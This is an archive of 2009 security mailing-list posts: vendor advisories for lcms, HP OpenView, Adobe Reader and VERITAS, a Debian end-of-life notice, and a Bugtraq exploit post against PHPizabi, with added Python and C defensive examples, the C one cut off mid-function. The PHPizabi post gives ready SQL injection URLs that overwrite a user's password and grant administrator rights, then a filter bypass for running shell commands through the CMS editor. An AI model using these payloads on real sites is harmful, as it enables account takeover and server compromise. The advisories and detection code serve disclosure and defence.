
===========================================================
Ubuntu Security Notice USN-744-1             March 23, 2009
lcms vulnerabilities
CVE-2009-0581, CVE-2009-0723, CVE-2009-0733
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  liblcms1                        1.13-1ubuntu0.2

Ubuntu 7.10:
  liblcms1                        1.16-5ubuntu3.2
  python-liblcms                  1.16-5ubuntu3.2

Ubuntu 8.04 LTS:
  liblcms1                        1.16-7ubuntu1.2
  python-liblcms                  1.16-7ubuntu1.2

Ubuntu 8.10:
  liblcms1                        1.16-10ubuntu0.2
  python-liblcms                  1.16-10ubuntu0.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Chris Evans discovered that LittleCMS did not properly handle certain error
conditions, resulting in a large memory leak. If a user or automated system
were tricked into processing an image with malicious ICC tags, a remote
attacker could cause a denial of service. (CVE-2009-0581)

Chris Evans discovered that LittleCMS contained multiple integer overflows.
If a user or automated system were tricked into processing an image with
malicious ICC tags, a remote attacker could crash applications linked
against liblcms1, leading to a denial of service, or possibly execute
arbitrary code with user privileges. (CVE-2009-0723)

Chris Evans discovered that LittleCMS did not properly perform bounds
checking, leading to a buffer overflow. If a user or automated system were
tricked into processing an image with malicious ICC tags, a remote attacker
could execute arbitrary code with user privileges. (CVE-2009-0733)






Date: Tue, 24 Mar 2009 01:04:28 -0600
From: nospam@gmail.it
To: bugtraq@securityfocus.com
Subject: PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation
 (php.ini independent)

--------------------------------------------------------------------------------
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini
independent)
by Nine:Situations:Group::bookoo
--------------------------------------------------------------------------------
our site: http://retrogod.altervista.org/
software site: http://www.phpizabi.net/
--------------------------------------------------------------------------------

vulnerability:
sql injection in /theme/default/proc.inc.php

<?php

function bufferProcParse($buffer) {
global $CONF;

$tpl = new template;
$tpl -> LoadThis($buffer);
// HANDLE POSTED NOTEPAD DATA ///////////////////////////////////////////////////////
if (isset($_GET["notepad_body"])) {
myQ("UPDATE `[x]users` SET `notepad_body` = '".urldecode($_GET["notepad_body"])."' WHERE `id`='".me("id")."'");
me("flush");
}
..

note urldecode() ...

exploitation, manual:

injection urls:

change username and password of an existing user:
[sql]', username = 'bookoo', password = md5('pass') WHERE username = 'user'/*
which becomes:
http://host/path_to_phpizabi/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user%2527/*

grant yourself admin rights:
[sql]', is_moderator = 1, is_administrator = 1, is_superadministrator = 1 WHERE username = 'bookoo'/*
which becomes:

http://host/path_to_phpizabi/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%20%2527bookoo%2527/*

navigate:

http://host/path_to_phpizabi/?L=admin.index

boom !

now go to:

http://host/path_to_phpizabi/?L=admin.cms.edit&id={cms.file}

use this opening and closing tag style, example:

<script language="php">
system("ls -la");
</script>

(it is always available, see: http://www.php.net/manual/en/language.basic-syntax.phpmode.php)
because of that preg_replace() in /modules/admin/cms/edit.php :

..
if (isset($_POST["Submit"])) {
if ($handle = fopen("modules/cms/{$_GET["id"]}.php", "w")) {

$body = "<?php if (!defined(\"CORE_STRAP\")) die(); ?>\n"
.preg_replace('#(<\\?.*\\?>)|(<%.*%>)|<\\?php|<\\?|\\?>|<%|%>#si', NULL, stripslashes($_POST["body"][0]))
."\n<!-- Edited by ".me("username")." on ".date($CONF["LOCALE_HEADER_DATE_TIME"])." -->";
;

fwrite($handle, $body);
fclose($handle);
..

which is bypassed.

save changes and navigate:

http://host/path_to_phpizabi/?L=cms._cms_file_

to see the output...

now visit log page:

http://192.168.0.1/phpizabi/?L=admin.logs.logs

..
--------------------------------------------------------------------------------

original url: http://retrogod.altervista.org/9sg_phpizabi_848bc1.html
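
Why the advisory stresses "note urldecode()", shown as an added example that is not part of the original post or of PHPizabi: it replays the decode, escape, decode order for one query value, flags double-encoded quotes in access-log lines, and contrasts string concatenation with a bound parameter. The `addslashes` stand-in, the SQLite table, the sample values and the log lines are all constructed assumptions.

```python
import re
import sqlite3
from urllib.parse import parse_qsl, unquote_plus, urlsplit


def addslashes(value):
    """Rough stand-in for PHP magic_quotes_gpc / addslashes(): escape ', " and backslash."""
    return re.sub(r"""(['"\\])""", r"\\\1", value)


def value_reaching_sql(raw_value, magic_quotes=True):
    """Replay the order of operations in bufferProcParse() for one raw query value."""
    seen_by_php = unquote_plus(raw_value)          # PHP decodes the query string into $_GET
    if magic_quotes:
        seen_by_php = addslashes(seen_by_php)      # escaping happens before the second decode
    return unquote_plus(seen_by_php)               # the explicit urldecode() in proc.inc.php


def has_unescaped_quote(value):
    """True if a single quote is preceded by an even number (including zero) of backslashes."""
    return re.search(r"(?<!\\)(?:\\\\)*'", value) is not None


# Detection: a parameter that still carries %27, %22 or %5c after ONE decode was double-encoded.
ENCODED_META = re.compile(r"%(?:27|22|5c)", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def double_encoded_params(log_line):
    """Return the names of query parameters that hide an encoded quote or backslash."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    query = urlsplit(match.group(1)).query
    # parse_qsl decodes each value once, which is what the application sees in $_GET.
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if ENCODED_META.search(value)]


# Constructed access-log lines (documentation IP ranges, benign note text).
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Mar/2009:10:00:01 +0000] "GET /phpizabi/?notepad_body=shopping+list HTTP/1.1" 200 512',
    '198.51.100.7 - - [24/Mar/2009:10:00:09 +0000] "GET /phpizabi/?notepad_body=it%27s+late HTTP/1.1" 200 512',
    '203.0.113.9 - - [24/Mar/2009:10:02:44 +0000] "GET /phpizabi/?notepad_body=it%2527s+late HTTP/1.1" 200 512',
]


def flagged_lines(lines):
    """Indexes of log lines with at least one double-encoded parameter."""
    return [i for i, line in enumerate(lines) if double_encoded_params(line)]


def store_note(conn, user_id, note, bound=True):
    """Write the note with bound parameters (hardened) or by concatenation (as in proc.inc.php)."""
    if bound:
        conn.execute("UPDATE users SET notepad_body = ? WHERE id = ?", (note, user_id))
    else:
        conn.execute("UPDATE users SET notepad_body = '" + note
                     + "' WHERE id = '" + str(user_id) + "'")


def demo():
    """Return (did the concatenated query parse?, table contents after the bound update)."""
    conn = sqlite3.connect(":memory:")             # SQLite stands in for the MySQL backend
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, notepad_body TEXT)")
    conn.execute("INSERT INTO users VALUES (1, ''), (2, '')")
    note = value_reaching_sql("it%2527s+late")     # the quote arrives unescaped
    try:
        store_note(conn, 1, note, bound=False)
        concatenation_ok = True
    except sqlite3.OperationalError:
        concatenation_ok = False                   # the stray quote ended the literal early
    store_note(conn, 1, note, bound=True)          # data stays data, only row 1 changes
    rows = conn.execute("SELECT id, notepad_body FROM users ORDER BY id").fetchall()
    return concatenation_ok, rows


if __name__ == "__main__":
    for raw in ("it%27s", "it%2527s"):
        print(raw, "->", repr(value_reaching_sql(raw)))
    print("flagged log lines:", flagged_lines(SAMPLE_LOG))
    print(demo())
```

The single-encoded value is escaped before it reaches the query; the double-encoded one is not, whatever the escaping setting, which is the "php.ini independent" part of the title.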

To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBMA02416 SSRT090008 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code
Date: Tue, 24 Mar 2009 05:36:54 -0700

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01696729
Version: 1

HPSBMA02416 SSRT090008 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2009-03-23
Last Updated: 2009-03-23

Potential Security Impact: Remote execution of arbitrary code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). The vulnerabilities could be exploited remotely to execute arbitrary code.

References: CVE-2009-0920, CVE-2009-0921

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Network Node Manager (OV NNM) v7.01, v7.51, v7.53 running on HP-UX, Linux, Solaris, and Windows

BACKGROUND
CVSS 2.0 Base Metrics 
==============================================
Reference         Base Vector                       Base Score
CVE-2009-0920     (AV:N/AC:L/Au:N/C:P/I:P/A:N)      6.4
CVE-2009-0921     (AV:N/AC:L/Au:N/C:P/I:P/A:N)      6.4
==============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.
 
The Hewlett-Packard Company thanks Oren Isacson of Core Security Technologies for reporting these vulnerabilities to security-alert@hp.com.

RESOLUTION

HP has made archive files available to resolve the vulnerabilities. The archive files are listed in the tables below. The tables also list required patches. The patches will ensure that NNM is compatible with the software files in the archive.

The patches are available from http://support.openview.hp.com/selfsolve/patches 

Note: The patches are not available from the HP IT Resource Center (ITRC). 

The archive files are available from: ftp://ss090008:ss090008@hprc.external.hp.com/ 

To install the archive files:

  1. Install the required patch listed below 
  2. Uncompress the archive (SSRT090008.QCCR1B26779.hotfix.tar.gz) 
  3. Unpack the archive (SSRT090008.QCCR1B26779.hotfix.tar) 
  4. ovstop -c 
  5. Follow the instructions in the README.txt file 
  6. ovstart -c 

OV NNM v7.53

Operating System         Required Patch             Archive File                        Archive File MD5 Sum
HP-UX (IA)               PHSS_38783 or subsequent   SSRT090008.QCCR1B26779.hotfix.tar   36f576b62383405841cc88f85292888a
HP-UX (PA)               PHSS_38782 or subsequent   SSRT090008.QCCR1B26779.hotfix.tar   36f576b62383405841cc88f85292888a
Linux RedHatAS2.1        LXOV_00089 or subsequent   SSRT090008.QCCR1B26779.hotfix.tar   36f576b62383405841cc88f85292888a
Linux RedHat4AS-x86_64   LXOV_00090 or subsequent   SSRT090008.QCCR1B26779.hotfix.tar   36f576b62383405841cc88f85292888a
Solaris                  PSOV_03517 or subsequent   SSRT090008.QCCR1B26779.hotfix.tar   36f576b62383405841cc88f85292888a
Windows                  NNM_01195 or subsequent    SSRT090008.QCCR1B26779.hotfix.tar   36f576b62383405841cc88f85292888a


OV NNM v7.51 
Upgrade to NNM v7.53 and apply the NNM v7.53 resolution listed above. Patch bundles for upgrading from NNM v7.51 to NNM v7.53 are available here: ftp://nnm_753:update@hprc.external.hp.com/ 

OV NNM v7.01

Operating System         Required Patch             Archive File                        Archive File MD5 Sum
HP-UX (PA)               PHSS_38761 or subsequent   SSRT090008.QCCR1B26779.hotfix.tar   36f576b62383405841cc88f85292888a
Solaris                  PSOV_03516 or subsequent   SSRT090008.QCCR1B26779.hotfix.tar   36f576b62383405841cc88f85292888a
Windows                  NNM_01194 or subsequent    SSRT090008.QCCR1B26779.hotfix.tar   36f576b62383405841cc88f85292888a


MANUAL ACTIONS: Yes - NonUpdate 
Apply the appropriate archive as described in the Resolution. 

PRODUCT SPECIFIC INFORMATION 

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa 

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS (for HP-UX)

For HP-UX OV NNM 7.51 and 7.53 
HP-UX B.11.31 
HP-UX B.11.23 (IA) 
HP-UX B.11.23 (PA) 
HP-UX B.11.11 
============
OVNNMgr.OVNNM-RUN,fr=B.07.50.00
action: install the patches and archive files listed in the Resolution 
URL: ftp://ss090008:ss090008@hprc.external.hp.com/ 

For HP-UX OV NNM 7.01 
HP-UX B.11.11 
============
OVNNMgr.OVNNM-RUN,fr=B.07.01.00
action: install the patches and archive files listed in the Resolution 
URL: ftp://ss090008:ss090008@hprc.external.hp.com/ 

END AFFECTED VERSIONS (for HP-UX)

HISTORY 
Version:1 (rev.1) - 23 March 2009 Initial release 

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com 
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.


To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
 
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

©Copyright 2009 Hewlett-Packard Development Company, L.P.

Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

From: ZDI Disclosures <zdi-disclosures@tippingpoint.com>
To: FD <full-disclosure@lists.grok.org.uk>,
bugtraq <bugtraq@securityfocus.com>
Cc: ZDI Disclosures <zdi-disclosures@tippingpoint.com>
Date: Tue, 24 Mar 2009 11:51:37 -0500
Subject: ZDI-09-014: Adobe Acrobat getIcon() Stack Overflow Vulnerability

ZDI-09-014: Adobe Acrobat getIcon() Stack Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-014
March 24, 2009

-- CVE ID:
CVE-2009-0927

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Acrobat

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 6255.
For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Adobe Acrobat and Adobe Reader. User
interaction is required in that a user must visit a malicious web site
or open a malicious file.

The specific flaw exists when processing malicious JavaScript contained
in a PDF document. When supplying a specially crafted argument to the
getIcon() method of a Collab object, proper bounds checking is not
performed resulting in a stack overflow. If successfully exploited full
control of the affected machine running under the credentials of the
currently logged in user can be achieved.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb09-04.html

-- Disclosure Timeline:
2008-07-03 - Vulnerability reported to vendor
2009-03-24 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Tenable Network Security

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

From - Tue Mar 24 16:52:51 2009
To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBUX02409 SSRT080171 rev.1 - HP-UX Running VERITAS File System (VRTSvxfs) or VERITAS Oracle Disk Manager (VRTSodm), Local Escalation of Privilege
Date: Tue, 24 Mar 2009 11:16:11 -0700

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01674733
Version: 1

HPSBUX02409 SSRT080171 rev.1 - HP-UX Running VERITAS File System (VRTSvxfs) or VERITAS Oracle Disk Manager (VRTSodm), Local Escalation of Privilege

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2009-02-23
Last Updated: 2009-03-21

Potential Security Impact: Local escalation of privilege

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX running VRTSvxfs and VRTSodm. The vulnerability could be exploited locally to cause an escalation of privilege. VRTSvxfs and VRTSodm are bundled with Storage Management Suite (SMS) and Storage Management for Oracle (SMO).

References: CVE-2009-0207

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11 running VRTSodm 3.5 
HP-UX B.11.23 running VRTSodm 4.1 or VRTSvxfs 4.1 or both 
HP-UX B.11.23 running VRTSodm 5.0 or VRTSvxfs 5.0 or both 
HP-UX B.11.31 running VRTSodm 5.0 

BACKGROUND

CVSS 2.0 Base Metrics
===============================================
Reference         Base Vector                       Base Score
CVE-2009-0207     (AV:L/AC:L/Au:S/C:C/I:C/A:C)      6.8
===============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

RESOLUTION

HP has provided the following patches to resolve this vulnerability. 
The patches are available from the following location: 

URL: http://itrc.hp.com 

HP-UX Release         Component from bundle        Patch ID
B.11.11               VRTSvxfs 3.5                 PHCO_39124
B.11.23 (IA and PA)   VRTSvxfs 4.1, VRTSodm 4.1    PHCO_39027, PHKL_39029
B.11.23 (IA and PA)   VRTSvxfs 5.0, VRTSodm 5.0    PHCO_39103, PHCO_39104, PHKL_38795
B.11.31               VRTSodm 5.0                  PHKL_39130
B.11.31               VRTSvxfs 5.0                 PHCO_38913, PHCO_39132


MANUAL ACTIONS: No 

PRODUCT SPECIFIC INFORMATION 

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa 

The following text is for use by the HP-UX Software Assistant. 

AFFECTED VERSIONS 

HP-UX B.11.11 
=================
VRTSvxfs.VXFS-RUN
action: install patches PHCO_39124 or subsequent 

URL: http://itrc.hp.com 

For VRTSvxfs 4.1, VRTSodm 4.1 
HP-UX B.11.23 
=================
VRTSodm.ODM-KRN
VRTSodm.ODM-RUN 
VRTSodm.ODM-MAN 
VRTSvxfs.VXFS-RUN 
VRTSvxfs.VXFS-RUN-PALIB 
VRTSvxfs.VXFS-PRG 
action: install patches PHCO_39027, PHKL_39029 or subsequent 
URL: http://itrc.hp.com 

For VRTSodm 5.0 and VRTSvxfs 5.0 
HP-UX B.11.23 
=================
VRTSodm.ODM-KRN
VRTSodm.ODM-RUN 
VRTSodm.ODM-MAN 
VRTSvxfs.VXFS-RUN 
VRTSvxfs.VXFS-RUN-PALIB 
VRTSvxfs.VXFS-PRG 
action: install patches PHCO_39103, PHCO_39104, PHKL_38795 or subsequent 
URL: http://itrc.hp.com 

HP-UX B.11.31 
=================
VRTSodm.ODM-KRN
VRTSodm.ODM-RUN 
VRTSodm.ODM-MAN 
VRTSvxfs.VXFS-RUN 
action: install patches PHCO_38913, PHCO_39132, PHKL_39130 or subsequent 
URL: http://itrc.hp.com 

END AFFECTED VERSIONS 

HISTORY 
Version:1 (rev.1) 23 March 2009 Initial release 

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. 



Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com 
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.


To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
 
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

©Copyright 2009 Hewlett-Packard Development Company, L.P.

Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBScja3eAfOvwtKn1ZEQLomgCffgw+V+B3Y8BwMdA/V4b6olPeIvUAnRjL
suM6zASihIRJbJkjnPp2QFW+
=WIrL
-----END PGP SIGNATURE-----

From - Tue Mar 24 17:42:49 2009
Date: Tue, 24 Mar 2009 22:20:14 +0100
From: Moritz Muehlenhoff <jmm@debian.org>
Subject: [SECURITY] [DSA 1753-1] End-of-life announcement for Iceweasel in oldstable
To: bugtraq@securityfocus.com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1753-1                  security@debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
March 24, 2009                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : iceweasel

As indicated in the Etch release notes, security support for the
Iceweasel version in the oldstable distribution (Etch) needed to be
stopped before the end of the regular security maintenance life cycle. 

You are strongly encouraged to upgrade to stable or switch to a still
supported browser.

On a side note, please note that the Debian stable/Lenny version of
Iceweasel - the unbranded version of the Firefox browser - links 
dynamically against the Xulrunner library. As such, most of the
vulnerabilities found in Firefox need only be fixed in the Xulrunner
package and don't require updates to the Iceweasel package any longer.

- ------------------------------------------------------------------------
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAknJTk0ACgkQXm3vHE4uyloEewCgxBSva03+zoz5H1vIKhxwXFGS
Bf8AoJQAvTeBN9KAo4v50cwEa4LgT57S
=gle/
-----END PGP SIGNATURE-----

From - Tue Mar 24 18:12:49 2009
Date: Tue, 24 Mar 2009 14:47:56 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
To: vulnwatch@vulnwatch.org, full-disclosure@lists.grok.org.uk,
bugtraq@securityfocus.com
Subject: iDefense Security Advisory 03.24.09: Adobe Reader and Acrobat JBIG2
 Encoded Stream Heap Overflow Vulnerability

iDefense Security Advisory 03.24.09
http://labs.idefense.com/intelligence/vulnerabilities/
Mar 24, 2009

I. BACKGROUND

Adobe Acrobat Reader/Acrobat are programs for viewing and editing
Portable Document Format (PDF) documents. For more information, see the
vendor's site found at the following link.

http://www.adobe.com/products/reader/
http://www.adobe.com/products/acrobatpro/

II. DESCRIPTION

Remote exploitation of a heap based buffer overflow vulnerability in
Adobe Systems Inc.'s Reader and Acrobat could allow an attacker to
execute arbitrary code with the privileges of the current user.

The vulnerability occurs when parsing a JBIG2-encoded stream inside of a
PDF file. JBIG2 is an image encoding format that is primarily used for
encoding monochrome images such as faxes.

When parsing the contents of a JBIG2 stream, a 32-bit value that
represents the number of values in a table is used to allocate a heap
buffer. This buffer is then filled with values from the file, without
properly checking the bounds of the buffer. This leads to a heap based
buffer overflow that can result in arbitrary code execution.

III. ANALYSIS

Exploitation of this vulnerability allows the attacker to execute
arbitrary code with the privileges of the user opening the file. The
attacker will have to create a malicious PDF file and convince the
victim to open it. This can be accomplished by embedding the PDF file
into an iframe inside of a Web page, which will result in automatic
exploitation once the page is viewed. The file could also be e-mailed
as an attachment or placed on a file share. In these cases, a user
would have to manually open the file to trigger exploitation.

Typically, heap based buffer overflows can be difficult to exploit due
to modern heap implementations that perform heap integrity checks.
However, Adobe Reader and Acrobat use a custom heap allocator which can
be abused to write arbitrary values to arbitrary locations. Labs testing
has demonstrated this vulnerability is highly exploitable.

JavaScript is not required to exploit this vulnerability, however, it
does make exploitation simpler.

IV. DETECTION

Acrobat Reader and Acrobat Professional versions 7.1.0, 8.1.3, 9.0.0 and
prior versions are vulnerable.

V. WORKAROUND

None of the following workarounds will prevent exploitation, but they
can reduce potential attack vectors and make exploitation more
difficult.

  Prevent PDF documents from being opened automatically by the Web browser.
  Disable JavaScript in the vulnerable products.
  Follow best practice methodologies by avoiding opening files from
untrusted or unsolicited sources.
  Deploy DEP (Data Execution Prevention).

VI. VENDOR RESPONSE

Adobe has released a patch which addresses this issue. For more
information, consult their advisory (APSB09-04) at the following URL:

http://www.adobe.com/support/security/bulletins/apsb09-04.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2009-0928 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

02/24/2009  - Initial Contact
02/24/2009  - Initial Response
02/24/2009  - PoC Requested
02/25/2009  - PoC Sent
03/06/2009  - Status update received - proposed release date of 03/18/2009
03/17/2009  - Vendor proposes new release date of 03/24/2009
03/24/2009  - Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by Sean Larsson, iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
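
The allocation pattern described in section II of the iDefense advisory above (a 32-bit count from the file sizes a heap buffer that is then filled from the file), shown as a hardened parser. This is an added example, not code from Adobe, iDefense or any project named in this archive; the count-prefixed table layout, `parse_table`, `alloc_size_32bit`, `MAX_TABLE_ENTRIES` and the sample bytes are assumptions made for illustration, and the size check also covers the integer-overflow class named in the lcms advisories.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Assumption: policy cap on entries. Set it to the largest table the
 * format can legitimately need, not to whatever the allocator accepts. */
#define MAX_TABLE_ENTRIES 65536u

enum parse_status { PARSE_OK, PARSE_TRUNCATED, PARSE_TOO_LARGE, PARSE_NOMEM };

struct table {
    uint32_t  count;
    uint32_t *values;
};

static uint32_t read_be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
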